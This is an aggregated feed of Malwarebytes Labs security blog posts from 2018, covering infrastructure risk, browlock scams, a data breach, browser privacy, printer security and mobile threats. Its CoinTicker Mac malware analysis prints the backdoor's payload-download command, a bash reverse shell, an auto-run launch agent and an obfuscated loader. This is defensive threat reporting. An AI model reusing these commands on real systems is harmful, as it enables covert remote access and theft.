Techie Feeds

Compromising vital infrastructure: transport and logistics

Malwarebytes - Tue, 11/06/2018 - 18:05

Back when I was a dispatcher for a courier and trucking company, we used to joke that it only took a few strategically-placed accidents to cause a traffic jam that could completely stop circulation around the city of Rotterdam.

Rotterdam is one of the major ports in the world and consequently, there is a lot of traffic coming in and out. The roads around the city can handle normal traffic, but they get congested during rush hours and when accidents happen. If you live or work near a city, you’re probably also stuck in a traffic jam on a regular basis.

In our series about vital infrastructure, this time we’re looking at transportation. And if you think transport is not that vital, you are underestimating the logistical processes that make getting to and from different locations possible.

In this post, we will focus on the main skeleton of our logistics infrastructure: the mass transportation of goods over the surface of the earth. How do the goods that we use every day make their way into the warehouses, stores, or factories that need them? We will deal with air and public transportation separately, as they use completely different infrastructures in order to function.

Shipping by sea or ocean

A lot of the goods we consume are manufactured a long way from home. The first leg of their journey is typically transported by ship across international waters. When you realize that the largest container ships can carry over 20,000 20-foot containers, you can also imagine the amount of paperwork and computing needed to get every one of those containers to the correct destination. And every one of them must go through customs—usually twice. Customs will want to know exactly what is in them or they will delay transporting the containers until they do.

Throwing a wrench in an otherwise well-oiled machine like that can have dire consequences as Maersk, one of the largest shipping lines, learned the hard way when their organization was hit by NotPetya. Estimates of the damages done due to a “serious business interruption” were around $300 million. This interruption also caused a massive supply delay, ranging from hours to several days.

Critical information systems used during these processes could be targeted as a means to disrupt the logistics network, which can slow down or even bring to a halt an entire country’s economic system.

Trains and river shipping

Depending on existing connections and infrastructure, goods will be transported in masses from harbors to inland destinations typical by train or boat. Unlike driving, these modes of transport allow for few ways to maneuver around a blocked part of the route to the destination.

Since train or river transport are mainly used for larger amounts of goods, they are also viable to attacks on the administrative side. In addition, physical attack vectors can hinder transport and mess with logistics. Some examples include:

  • Cutting the power to a rail-track
  • Disabling the railway signals
  • Disabling rail traffic management systems
  • Gaining control over sluices or other means to control the water level in rivers and canals
  • Jamming radars, so ships will have to slow down to avoid collisions
Road transport

Although one truckload is small compared to the transportation modes we have discussed so far, attacks on major delivery firms like FedEx can be highly effective. In fact, the damages due to the NotPetya infection at their TNT division were in roughly the same region as those estimated by Maersk after the same infection.

Even though trucks have more options to avoid roadblocks than trains and riverboats, huge slow-downs can be caused by tactically-employed attacks at important infrastructures, such as tunnels, bridges and highway intersections. And you don’t need to cause accidents to accomplish this. Hacking traffic control systems is much less dangerous and possibly more effective means of disruption if you are able to implement it on a large scale.

Special parts of the logistics infrastructure

The first part we need to consider is the container terminals. The average daily yard utilization of large container terminals in Europe is about 10,000–20,000 containers, resulting in about 15,000 movements per day. Handling a container ship of the Post Panamax size requires about 150 moves per hour, which means using five cranes that are able to handle 30 moves per hour each. Planning and keeping track of all these movements is heavily computerized and therefore vulnerable to cyberattacks.

Of the thousands of ports worldwide, only about one hundred have a global importance. These ports are an attractive target for attack.

The second part is bunkering, which is an essential part of transport. Electric trucks and ships are still a rare commodity, so most of them will need to refuel at regular intervals. Cutting off oil supplies to a country that does not have the capacity to produce enough of its own is a sure way to stifle transport and bring its economy to a standstill.


Most of the cyberattacks we have seen to date that have had a major impact on transportation systems are ransomware attacks. These infections are hard to predict and, in some cases, hard to stop. But you can be sure that the logistics infrastructure will be a target in the case of a full-scale cyberwar.

So far, awareness of this fact alone hasn’t been enough to implement adequate countermeasures—at least not adequate enough to counter a ransomware infection like NotPetya. And let’s not forget that WannaCry threw Germany’s rail network into chaos, disrupted FedEx’s delivery unit, and wreaked havoc among many others.

If this much damage can be done by a mindless ransomware attack, can you imagine what kind of destruction a targeted APT could cause? If you can hinder the enemy’s ability to move goods, supplies, and troops, that is a big advantage in warfare. This fact about military logistics was known and implemented as far back as the American Civil War (1861–65), where both armies used railways extensively for transport of personnel, supplies, horses and mules, and heavy field pieces. Both sides tried to disrupt the enemy’s logistics by destroying trackage and bridges.

Paying the price

In a line of business like logistics, where every penny counts, cybersecurity may be one of the last things managers care about. But that doesn’t make it any less important. The damage done by an organization-wide ransomware infection can put companies out of business. Having to rebuild your network while the core business has to be conducted by hand (and memory) is not just frustrating; it’s costly. Recovering from a cyberattack requires time and attention that cannot be spent on other tasks.

Keeping transportation infrastructure itself safe and secure is a government task, since it is also a matter of national security to protect these assets during a cyberattack. The technology behind our infrastructure plays an important part in determining both the logistical capabilities and the control we have over them.

Spending on critical infrastructural improvements should include cybersecurity as an important consideration. Companies in logistics, from the major shipping lines down to the local trucking companies, are aware of the important task they are fulfilling, and should not shy away from taking a good hard look at their existing security measures. Do they reflect the importance of their business to the overall economy of the region? Are they prepared to survive a ransomware attack? Is their staff trained to recognize phishing attempts? Are their computer systems protected against malware and targeted attacks?

Trust us, the first time you need the protection, a strong cybersecurity policy, training program for employees, and technical solution will already have paid itself back a thousand times.

Stay safe, everyone!

The post Compromising vital infrastructure: transport and logistics appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Browlock flies under the radar with complete obfuscation

Malwarebytes - Mon, 11/05/2018 - 20:37

Browlocks are the main driving force behind tech support scams, using a combination of malvertising and clever browser locker tricks to fool users. In fact, the effects can be so convincing that people call the rogue Microsoft support number for help because they believe their computer has been hijacked.

Crooks are constantly trying out new tricks to defeat modern browsers and evade detection. Recently we’ve seen the “evil cursor” that prevents you from closing the fake alert, and the fake virus download that insinuates your computer is already infected. This time, we look at how browser locker pages use encoding to bypass signature-based detection.

Encoding and other obfuscation types

The use of Base64 or hex encoding to hide malicious scripts is as old as the moon. Malware authors have been relying on those to make identification of malicious code much more difficult for both human eyes and scanners.

Tech support scammers have been no stranger to leveraging obfuscation within their browser locker templates. For instance, by using this hexadecimal encoding below, the crooks can mask the fake warning message from prying eyes:

However, browsers can read and decode the hex encoded content and display it to the user as the following (fake) alert:

************************************************* RDN/YahLover.worm!055BCCAC9FEC Infection *************************************************

Not all tech support scam browlocks use obfuscation, but over the years it has become more common to see parts of the code being hidden. What we haven’t really seen is complete encoding of the browlock page such that almost no artifacts are present.

Soup to nuts encoding

We recently came upon a browlock template reported on Reddit that has taken encoding to a whole new level, on top of using the aforementioned unpatched, existing techniques. Its source code page is beautifully simple and yet effective:

We can see two JavaScript libraries that are being retrieved. One is called Zepto.js, which according to its author is “a minimalist JavaScript library for modern browsers with a largely jQuery-compatible API.” The more interesting library is this base64.min.js file, which gets Base64 encoded content and decodes it on the fly. Note how this data is not loaded from the main page but rather from a following GET request:

There is no denying that crooks are once again trying to play cat and mouse with defenders. Perhaps as a tongue-in-cheek gesture, they even created a bogus Google Analytics tracker ID: gtag(‘config’, ‘UA-8888888-x’), in addition to using the maps-google[.]us Google look-alike domain.

For end users, it is important to remember that no matter how scary a warning looks or even sounds, the best course of action is to remain calm and take the time to check on it before overreacting and dialing a scammer’s hot line. These browlocks are not causing any damage to the computer and can be closed one way or another. The more annoying ones still require using the Task Manager to kill the offending process, which is why we hope browser vendors take these issues seriously to restore power to the user. But otherwise, taking time to investigate does no harm, no foul.

Malwarebytes Browser Extension is not fooled by this obfuscation trick and already protects users from this browlock.

The post Browlock flies under the radar with complete obfuscation appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 29 – November 4)

Malwarebytes - Mon, 11/05/2018 - 17:37

Last week on Malwarebytes Labs, we looked at a rogue cryptocurrency app installing backdoors, took a dive into the world of printer security, explored browser privacy tweaks, highlighted a music festival–themed breach, and introduced Malwarebytes for Chromebook.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (October 29 – November 4) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Introducing Malwarebytes for Chromebook

Malwarebytes - Thu, 11/01/2018 - 15:00

Have you been thinking about switching over to Chromebook because you don’t need all the built-in software programs of a PC or the sleek design of a Mac? Or perhaps you’ve already made the jump because Chromebooks are so much cheaper than a Windows or Mac system. Either way, did you worry that you would miss using Malwarebytes? You no longer need to be afraid!

Malwarebytes for Chromebook

We are proud to present to you Malwarebytes for Chromebook. In Malwarebytes’ quest for a malware-free existence, we want to provide security for as many computers, devices, and endpoints as possible. Offering a product that protects and cleans Chromebooks from malware is only a natural next step in that process.

Chromebooks are up and coming in the market due to their lower production costs associated with a reduced need for top-of-the-line hardware. (Translation: They’re much cheaper than other computers.) Chromebooks store their data in the cloud so they don’t need big, fast hard drives. And since you can’t run any heavy games on them, they don’t need a fast CPU or a heavy duty graphics card either—which means they likely won’t be targets for malicious cryptomining. Bonus!

Chromebooks are also user friendly. If you can use a browser, you can use a Chromebook, so to speak. This makes them a good choice for people that have only just started using computers, like school-age children and other computer beginners with more experience in life. But they also make for a good alternative to expensive laptops used in the workplace. If employees rely heavily on the cloud or use only web-based apps anyway, it makes sense to save costs and make the switch.

What is Malwarebytes for Chromebook?

Malwarebytes for Chromebook offers Chromebook users protection by blocking scams, protecting your privacy, and scanning for malware. It’s capable of detecting threats such as ransomware, potentially unwanted programs (PUPs), and adware. Your Chromebook is protected by design against the regular threats that face Windows and Mac users, but it is susceptible to the same threats as Android systems. And that is where Malwarebytes for Chromebook can help you.

Why do you need Malwarebytes for Chromebook?

Even though Chromebooks come with some built-in defense mechanisms like sandboxing and verified boot and recovery mode, they can still get infected. Malwarebytes for Chromebook does not slow down your lean, mean Chromebook machine. It does stand guard over your privacy and data security while protecting you against ransomware, adware, and other modern-day malware.

How does Malwarebytes for Chromebook work?

Malwarebytes for Chromebook’s features focus on both protection and remediation. It:

  • Detects and blocks ransomware before it can execute and lock down the device.
  • Conducts a comprehensive privacy audit, identifying the access privileges of every app on your Chromebook device so you know exactly which information you’re sharing.
  • Finds and removes adware and other malware. It searches all the files and apps quickly and effectively for malware or potentially unwanted programs such as screen lockers or adware.
Easy on the eyes

Malwarebytes for Chromebook provides the user with easy-to-understand information about the status of its security in an interface that’s clean and simple. Users that are familiar with Malwarebytes for Android will recognize the popular UI design.

Where can I get Malwarebytes for Chromebook?

Malwarebytes for Chromebook is only supported on Chromebooks with Google Play Store access.

Information about the available versions and languages can be found on our product page. You can download and install Malwarebytes for Chromebook from the Google Play Store. If you need help, you can ask questions on our forums or contact our Support team.

Even when using alternative, cost-savings devices, Malwarebytes believes you have the right to protect your privacy, as well as be protected from threats like malware. Cybercriminals won’t discriminate based on the machine you use. Your personal data, login credentials, and credit card information are just as valuable to them. So stay safe, everyone! Even—or rather, especially—on your Chromebook.

The post Introducing Malwarebytes for Chromebook appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tomorrowland festival goers affected by data breach

Malwarebytes - Wed, 10/31/2018 - 17:27

Tomorrowland, a major international music festival, has revealed a data breach potentially affecting around 60,000 attendees.

This one is a little different though, as the data accessed without permission isn’t recent. In fact, it dates back four years to an event long since come and gone. According to a Tomorrowland spokesperson, the managers of the Paylogic ticketing system noticed “unusual activity” on an older server. This server contained data for the 2014 event, but the hackers left everything else alone.

“Sensitive” versus “not sensitive”

The hacked server is now offline, and anyone potentially affected should have been made aware of what’s going to happen next. As with most breaches, it involves notification emails and a helpful set of suggestions for cybersecurity best practices.

Accounts conflict about what specifically was breached, accessed, and stolen in the Tomorrowland attack. This may be due to primary news sources being in languages other than English, and things are being lost in translation.

Tomorrowland representatives claim access to sensitive data did not take place. This is where things become reliant on your personal definition of what constitutes “bad” or merely “sort of bad.”

Data taken includes name, email, gender, age, and post code. Data not taken includes payment details, passwords, and addresses.

I suspect everyone’s mileage may vary greatly with regards to what constitutes “sensitive data” here. Depending on which region of the world you come from, a post code alone could drill you down to a couple of houses or a single street. At that point, the specific address probably doesn’t matter too much. With the post code and a name, you could easily find the exact house via publicly-listed information, a voting register, or a house sale.

That seems pretty sensitive to me.

Phishing risks

A dubious phishing attempt is more than doable here as a result of the data taken by scammers. Any communications regarding ticket sales, offers, promotions, or anything else you can think of should be greeted with a healthy dose of suspicion.

Revisit your mailbox and check for any interactions with event organisers the moment you receive any official communications. Have a look at anything you’ve replied to related specifically to Tomorrowland. In particular, pay attention to anything involving payments, password resets, or submission of further personal information. Ignore all rogue emails and send them straight to the recycling bin.

Without further information on when the breach took place, it’s difficult to say how long people should be concerned. We don’t know if the unauthorised access took place last week, last month, or last year. We can’t say how long people were sitting on the stolen information, or if it’s old news for scammers. Potentially, anything worthwhile in the haul has long since stopped being relevant or useful.

Pulling the plug: a good idea

It’s odd that a server containing data from a one-off event in 2014 was still online. Despite this, it’s entirely possible it was online for specific reasons we can’t guess at. Even so, it’s a good cautionary warning to remind admins to take anything offline that doesn’t really need to be there. Even data that should definitely be online for various reasons will often fall victim to attacks and scams.

A full audit, a sensible backup policy, and old data stored securely will solve a lot of these potential headaches. Everybody likes a music festival to be as eventful as possible, but this is perhaps a little too eventful. We hope you experience zero breaches, sensibly priced burgers, and permanently short queues for an abundance of portable toilets.

The post Tomorrowland festival goers affected by data breach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to tighten security and increase privacy on your browser

Malwarebytes - Wed, 10/31/2018 - 16:41

Is my browser making an effort to keep my system safe and my online behavior private? This is usually not the first question we ask ourselves when we choose our default browser. But maybe it should be.

These days, threats to your privacy and security come at your from all angles, but browser-based attacks such as malvertising, drive-by downloads, adware, tracking, and rogue apps make going online and conducting a search a little more dangerous. Therefore, it’s important take note of what browsers are doing to shore up their defenses—and what you can do to optimize them.

When it comes to online privacy, it looks as if the silent majority of Internet users have shifted from the “I have nothing to hide” frame of mind to the “they already know everything anyway” group. And based on recent events, many social media users might right. Effectively, both groups feel as though it is not worth the trouble to jump through hoops to keep their data private. So should this even be a consideration?

While privacy is ultimately a personal choice, we believe it is still a right. So we’ll continue to offer our advise for those who are interested.

But let’s look at the security aspect first. This is something we can all agree on.

Browser security measures

There have been a few initiatives taken recently by the major browsers to enhance their safety.

  • Google has decided that Chrome extensions submitted to the Web Store will not be allowed if they contained “obfuscated” code. According to Google, developers should not have to hide their code. It makes it hard to decide whether they should allow the extension, and most obfuscated extensions turned out to be malicious.
  • Google is in the process of putting an end to “inline installation” of extensions. This means websites can no longer directly install Chrome extensions using the Chrome API, but have to send you to the Web Store. While this process will only be finished by the end of the year, distributors have already adapted their methods to deliver their extensions.
  • Mozilla (Firefox), Google (Chrome), Apple (Safari), and Microsoft (Edge and Internet Explorer) have announced to drop support for the TLS (Transport Layer Security) 1.0 and 1.1 encryption protocols in early 2020. This will force websites to start using the newer and more secure protocols.
  • WebRTC leaks and vulnerabilities were solved. Real-time communication features could expose your true IP address via STUN requests with Firefox, Chrome, Opera and Brave browsers, even when you were using a VPN.

In earlier stages of privacy and security audits, all the major browsers had already added options and features like URL filtering, download protection, “do not track” capabilities, and measures against browlocks. They are not all using the same methods, and some are more effective than others, but the efforts were made nonetheless.

Remaining problems

Despite all the attempts to apply some pest-control on adware, malicious cryptominers, and other assorted browser hijackers, there will always be those that manage to slither through and infect users. And that doesn’t even take into account the multitude of potentially unwanted programs (PUPs) that most parties don’t even seem to care about at all. However, readers of this blog will undoubtedly know the way to our Malwarebytes products page, where they can download a cure for an infected browser.

Besides the obvious ramifications of an adware, PUP, or hijacker infection, there is still more work left to do to for those of us that value our online privacy.

Browser privacy

The upside of being able to use browser extensions is that there are many good ones out there that can help you establish a more private browsing experience. Ad-blockers, anti-tracking tools, and protective extensions add further protection.

You can also tighten your privacy by using a Virtual Private Network (VPN) to anonymize your traffic. You have options here, since you can install a VPN to anonymize all your Internet traffic, or you can install a VPN extension that will do so for your browser only. Since a VPN slows down the Internet connection, the choice will be based on which other Internet connections you use and your personal preference.

You could even decide to use one browser with a VPN extension and another without one. Personally, I use different browsers for different purposes. This is called compartmentalization and it allows you to visit trusted (and preferably bookmarked) websites with a quick browser and do your regular surfing with a fully protected and anonymized browser.

Besides using a VPN, you can also look at some alternative browsers that are already optimized for privacy and security:

  • The TOR software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world.
  • Freenet is a peer-to-peer platform for censorship-resistant communication and publishing that is available for Windows, macOs, and Linux.
  • Waterfox is a secure and private browser based on Firefox, that allows you to use Firefox extensions. It is available for Windows, macOS, Linux, and Android.
  • Pale Moon is another Mozilla fork, but it doesn’t work with all Firefox extensions. It is available for Windows and Linux.
  • Brave is a Chromium-based browser that blocks unwanted content by default and does not need much tinkering to keep you safe and private. Brave is available for Windows, macOs, Linux, iOS, and Android.
Anonymous searching

We have talked about (not so) private search extensions before, but I want to mention a search engine that does deliver on the promised private searches, and that was brought up in the comments to that blogpost (thanks Patrick). It is called DuckDuckGo, and you can perform searches directly from their site or you can install their app or extension.

Test to see whether your browser is safe against fingerprinting

Browser fingerprinting is a method used by commercial websites to uniquely identify visitors based on the way you have configured your browser and some other metrics that they can fetch from your browser, such as timezone.

If you feel you have already done your best to make your browser untrackable, pay this site a visit: It provides visitors with an option to do a test and analyze how well their browser and add-ons protect them against online tracking techniques. The site will also be able to see if your system is uniquely configured and therefor identifiable, even if you are using privacy-protective software.

Don’t get hung up on the test result alone though, because the number of results you are compared with plays a big role in the outcome. For example, coming from a small country or language area may give you away when no one else from that area has taken the test. This doesn’t automatically mean advertisers will be able to track you as well. Do pay attention to the specified fingerprinting results. You can access those by clicking on the fingerprinting link in the Test column.

Blocking advertisements

As we have explained in the blogpost Everybody and their mother is blocking ads, so why aren’t you?, blocking advertisements provides a vital security layer that not only severs a potential vector for online malvertising attacks, but also blocks privacy-invading tracking plugins from collecting and harvesting your personal information.


Cookies are another topic that we have discussed earlier. Most cookies are not worth worrying about, but it is a good idea to be aware of them. How could you not be aware with every site asking your permission, right? In the blogpost Cookies: Should I worry about them?, we have explained how you can check and control the cookies that you want to allow.

Level of concern

So, while many major browsers are doing their best to keep you secure and private, it depends on your own level of concern how far you want to take this journey. There are specialized browsers, extensions, search engines, and other tools to help you achieve any level of privacy. Most people will be satisfied by customizing their mainstream browser to fit their needs, while others wouldn’t think of going online unless they are using Tor behind a VPN. To each their own. As long as you are aware of the risks. And we hope this post will help you to achieve the level you are after.

Stay safe, everyone!

The post How to tighten security and increase privacy on your browser appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Removing the jam in your printer security

Malwarebytes - Tue, 10/30/2018 - 16:00

Printers are an important, invisible—albeit sometimes loud—component of the office. But all too often they’re filled with mystery meat icons, peculiar blinking lights, or error messages with no instruction manual to hand. No problem, you can just print at the next station!

Wrong. Printers also operate online across multiple aspects of your network. So not only are you stopped from printing that healthcare policy form you had to sign, but now you have to wonder: what else may have been intercepted?

This frustration with basic printer/hybrid device operations usually spills over into the workplace with detrimental results. When basic functionality remains a mystery, it can cause plenty of issues elsewhere. In an age of hackable online toasters and home security systems keeping people out of their homes during maintenance, it’s no wonder we forget some of the more mundane perils sitting closer to home.

But wait…printers?!

Don’t think that printers just come out of the box fully secured and ready to roll. You’re probably going to have to do some configuring, both for the printer and any devices that make use of it. Not to mention, there’s physical security to consider, too.

There are a number of ways printers can cause problems for security, and in a few cases they don’t even need to be online. Roughly 80 percent of US offices are open floor plan now, and more often than not, printers and their contents are left lying around for all to access. Something as basic as a poorly-implemented office layout could cause issues by essentially giving dozens of employees physical access to sensitive documents—and that’s just one of the perils to consider.

Outside of physical access, there are also network vulnerabilities that an admin will need to be sure to update and run all patches for. In addition, accidental or purposeful leaks of scanned or printed documents are an area of concern for highly-sensitive content, such as paychecks, or valuable proprietary information of high-profile targets.

You may not have even considered your printer to be a security issue up to this point, but we’re not making this up. Default settings allowed this printer to potentially serve as anonymous file storage for malicious use. Elsewhere, 150,000 printers worldwide were compromised to “raise awareness of exposed printers.” Got a printer with extras like the ability to fax and turn back the clock to 1991? Whoops, a malicious fax helps take over a PC.

If this is all horribly new to you, don’t worry. We’ll lead you through some of the most common security flash points for printers and hopefully point you in the right direction. 

Physical security: for your convenience?

The whole point of a printer in the office is that anyone can use it, no matter which floor they’re located on, or even if they work from home. It’s not exactly uncommon for someone being the sole person responsible for printing a document that somebody a few hundred miles away needs to receive. But how can you guarantee the correct recipient is standing in front of the tray when the document leaves the device? And what can you do to ensure the data is securely encrypted while it travels inside your network?

The good news is, a lot of this functionality is now built into modern printers so you can plan accordingly. Many models offer various levels of physical security to accommodate your requirements.

For example, you may want a secure lock on your paper tray if the paper inside is to be used for something business critical. Or how about a variety of watermark-style patterns appearing when unauthorised printing occurs

Some manufacturers offer up secure pull printing, where the documents won’t be released from the printer queue without the correct recipient presenting a PIN, or an ID card, or even a QR code. This means no sensitive documents lying around in a tray for anyone to pick up, and—bonus—it even helps the environment by not spilling wasted paper all over the place.

Manufacturers might also provide encryption for wherever the document is stored in the print queue, whether on site or in the cloud, and offer encryption for every step of the document’s journey across the network.

With these types of processes in place, you may not need to worry about additional security measures of a slightly less hi-tech variety. These may include:

  • Making staff top up ID cards with “printing funds” to ensure lack of paper waste and rogue prints lying all over the place
  • Installing the printer in a secure, lockable room with CCTV
  • Restricted access to certain types of paper used for money wires or billing/expense claims

If you’re stuck with a printer model that doesn’t do most or all of the above, these are the backup measures you’ll want to keep in mind. 

Locking down digital files and network authentication

You won’t find many printers lacking the ability to scan, and while locked-down print jobs are all well and good, there’s an obvious risk from paper files becoming digital ones, which could then be sent to all and sundry.

This is why some devices offer services such as locking down PDF scans, which usually involves automatically placing a password onto the file: to open it, you’ll need to have authorisation to receive the password in the first place. Others will even encrypt the scan, adding to a general overall sense of “This probably won’t end up on eBay.” If you need a device to allow some forms of protocol but deny others, or operate within certain network security policies, there are some that can potentially do that too (browse to Section 3).

At the top end of printing hardware, the devices can do everything from ensuring BIOS integrity and whitelisting to running real-time intrusion protection. This is quite a way off from me feeling reasonably accomplished when freeing up my tenth paper jam of the day, but the increased complexity in device security is definitely worth it for organisations in need of paper trails, auditing, and locking down every last inch of their potential attack surface.

Memory retention: all in the mind

Modern printers tend to have a bit of storage space rattling around in their plastic casing, alongside support for USB sticks and memory cards. The good news is, the bulk of it is temporary and is supposed to vanish in a puff of smoke (hopefully not literal smoke, or you have a whole new set of problems to worry about) when you unplug the device.

Even so, if you’re going to dispose of a printer, you’ll want to make sure you’ve done a few things. First: remove all external storage such as USB sticks and memory cards. After that, check the manual and see exactly what kind of storage is included in the hardware and how you wipe it. The chances of anyone coming across your old printer and trying to reconstruct or extract content from it is extremely remote, so this is an absolute last step.

10 percent ink remaining

There’s a lot to think about where printer security is concerned, along with a few special considerations. The near endless stream of people having to use a handful of devices across an organisation on a daily basis is unique, and presents additional worries where social engineering and insider threats are concerned. Some of the more rock solid security solutions for printers can be rather expensive, and not everyone has a budget to accommodate those kinds of purchasing decisions.

Having said that, even if you can’t drag the latest and greatest technology into the office, you can certainly come up with a few Plan B’s like some of those listed up above. Once you realise how vulnerable an insecure printer on the network can be, something is most definitely better than nothing.

The post Removing the jam in your printer security appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mac cryptocurrency ticker app installs backdoors

Malwarebytes - Mon, 10/29/2018 - 17:20

An astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend. It seems that the app is covertly installing not just one but two different backdoors.


The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin.

The app’s preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Etherium, and Monero.

Although this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Without any signs of trouble, such as requests for authentication to root, there’s nothing to suggest to the user that anything is wrong.

When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell.

The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS:

nohup curl -k -L -o /tmp/.info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/ -k 111111qq; python /tmp/

The first part of the command downloads an encoded file from a Github page belonging to a user named “youarenick” and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named Finally, it executes the resulting Python script.

The script performs multiple tasks. First it opens a reverse shell connection to a command & control server, using the following command:

nohup bash &> /dev/tcp/ 0>&1

(The domain resolves to this IP address.)

Next, it downloads the the EggShell mach-o binary, saving it to /tmp/espl:

curl -k -L -o /tmp/espl

Finally, it creates and runs a shell script at /tmp/, which also establishes a reverse shell.

#! /bin/bash nohup bash &> /dev/tcp/ 0>&1

The CoinTicker app also creates a user launch agent, named .espl.plist, that runs the same command periodically:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>AbandonProcessGroup</key> <true/> <key>Label</key> <string></string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>nohup curl -k -L -o /tmp/.info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/ -k 111111qq; python /tmp/</string> </array> <key>RunAtLoad</key> <true/> <key>StartInterval</key> <integer>90</integer> </dict> </plist>

If it seems like this results in the espl binary being launched multiple times, that is indeed the case.

The software also creates a folder within the user’s Containers folder named .UpQZdhkKfCdSYxg, which is home to a Python script named plQqVfeJvGo. (We believe these names are randomized, but unfortunately the CoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the content:

#!/usr/bin/env python # -*- coding: utf-8 -*- import os import getpass import uuid def get_uid(): return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode()))) exec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 ... TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))

Extracting the script reveals that it is the script from the EvilOSX backdoor made by Github user Marten4n6.

#!/usr/bin/env python # -*- coding: utf-8 -*- """Minimal bot which loads modules as they are needed from the server.""" __author__ = "Marten4n6" __license__ = "GPLv3" __version__ = "4.1.1" ...

This script has been customized to cause the backdoor to communicate with a server at on port 1339. The malware also creates a user launch agent named designed to keep this script running.


Although it’s unknown exactly what goal the hacker behind this malware had in mind, both EggShell and EvilOSX are broad-spectrum backdoors that can be used for a variety of purposes. Since the malware is distributed through a cryptocurrency app, however, it seems likely that the malware is meant to gain access to users’ cryptocurrency wallets for the purpose of stealing coins.

At first, this looked like it could have been a supply chain attack, in which a legitimate app’s website is hacked to distribute a malicious version of the app. Such attacks have happened multiple times in the past, such as when the Transmission site was hacked (twice) to distribute KeRanger and Keydnap, or when a Handbrake mirror server was hacked to distribute Proton.

However, on further inspection, it looks like this app was probably never legitimate to begin with. First, the app is distributed via a domain named This is close to, but not quite the same as, the name of the app. Getting the domain name wrong seems awfully sloppy if this were a legitimate app. Adding further suspicion, it seems that this domain was just registered a few months ago on July 13.

For this reason, Malwarebytes for Mac detects the CoinTicker application in addition to the other components of this malware, as OSX.EvilEgg.

One interesting note about this malware is that none of it requires anything other than normal user permissions. Root permissions are not needed. There is often an erroneous over-emphasis on malware’s need for root privileges, but this malware is a perfect demonstration that malware does not need such privileges to have high potential for danger.

Indicators of Compromise

Files created:

/private/tmp/.info.enc /private/tmp/ /private/tmp/ /private/tmp/espl ~/Library/LaunchAgents/.espl.plist ~/Library/LaunchAgents/[random string].plist ~/Library/Containers/.[random string]/[random string]

Network connections:

SHA-256: f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4 espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490

The post Mac cryptocurrency ticker app installs backdoors appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 22 – 28)

Malwarebytes - Mon, 10/29/2018 - 17:00

Last week on Malwarebytes Labs, we took a look at some new Mac malware,  gave you a roundup of 2018 exploit kits, and dispensed some advice on sextortion scams. We also looked at the Cathay Pacific breach, groaned at the revival of an old browser trick, and explained how voting machines and elections are vulnerable to attack.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (October 22 – 28) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: top five scariest mobile threats

Malwarebytes - Mon, 10/29/2018 - 15:00

In the spirit of this upcoming Halloween season, we thought we’d provide you with a list of the top five scariest mobile threats in our book.

The list is organized from least to most haunting, based on my own humble opinion gathered from several years as a mobile threat researcher. Of course, my opinion has also been formed by the data we’ve collected within the last few months that shows which threats have been terrorizing customers the most. Without further ado, these are the top threats that haunt my dreams.

5) The clinking of locks and chains

Although not the most prevalent mobile malware (thank goodness), mobile ransomware’s nastiness will give you the chills. It starts by tricking users into giving away their device administrator rights.  Afterwards, the ransomware offers a treat of locking the device from any use unless you pay a ransom.

Even scarier, some mobile ransomware threatens prosecution by law enforcement, claiming illegal activities have been conducted on the device. This is all a hoax, as law enforcement would never request paying a fine through payment methods like Bitcoin or gift cards. The most popular mobile ransomware family is detected by Malwarebytes as Android/Ransom.SLocker.

4) Guerrilla warfare

As a mobile researcher, it sometimes feels like a war out there. This is especially true with the mobile malware Android/Trojan.Guerrilla. Guerrilla warfare can be described as irregular, which sums up this Guerrilla’s tactics of obfuscating malware scanners. Infections usually come with multiple variants of Guerrilla running on the device. However, for every move they make, we have a counter move. The war is never-ending.


3) Dashing from ghosts?  No, to the top of detections list!

Android/Adware.MobiDash will make your skin crawl! It’s one most highly-detected threats we’ve seen on customers’ Android devices! As if possessed, MobiDash goes above and beyond the typical low-level adware. It starts by sneaking its way into getting device administration rights.  Once given, the user will be doomed with ads on his lock screen.

Good luck uninstalling, as some versions are especially good at hiding themselves in plain sight!

2) Lurking in the shadows…of code!

Another high-ranking threat found on customer’s Android devices, Android/Trojan.HiddenAds, is a smooth criminal. Also known as Android/Trojan.Hiddad, its haunting ability to effectively hide its malicious code is terrifying! In fact, it often bypasses Google Play Protect‘s verification system.  Thus, apps infected with HiddenAds make it onto the Play Store. After installing on a device, periodic full-screen ads will haunt you!

1) The one that keeps me up at night: Adups

Seriously, I have lost sleep over this one. Adups and I have a long history:

Mobile Menace Monday: Adups, old and new

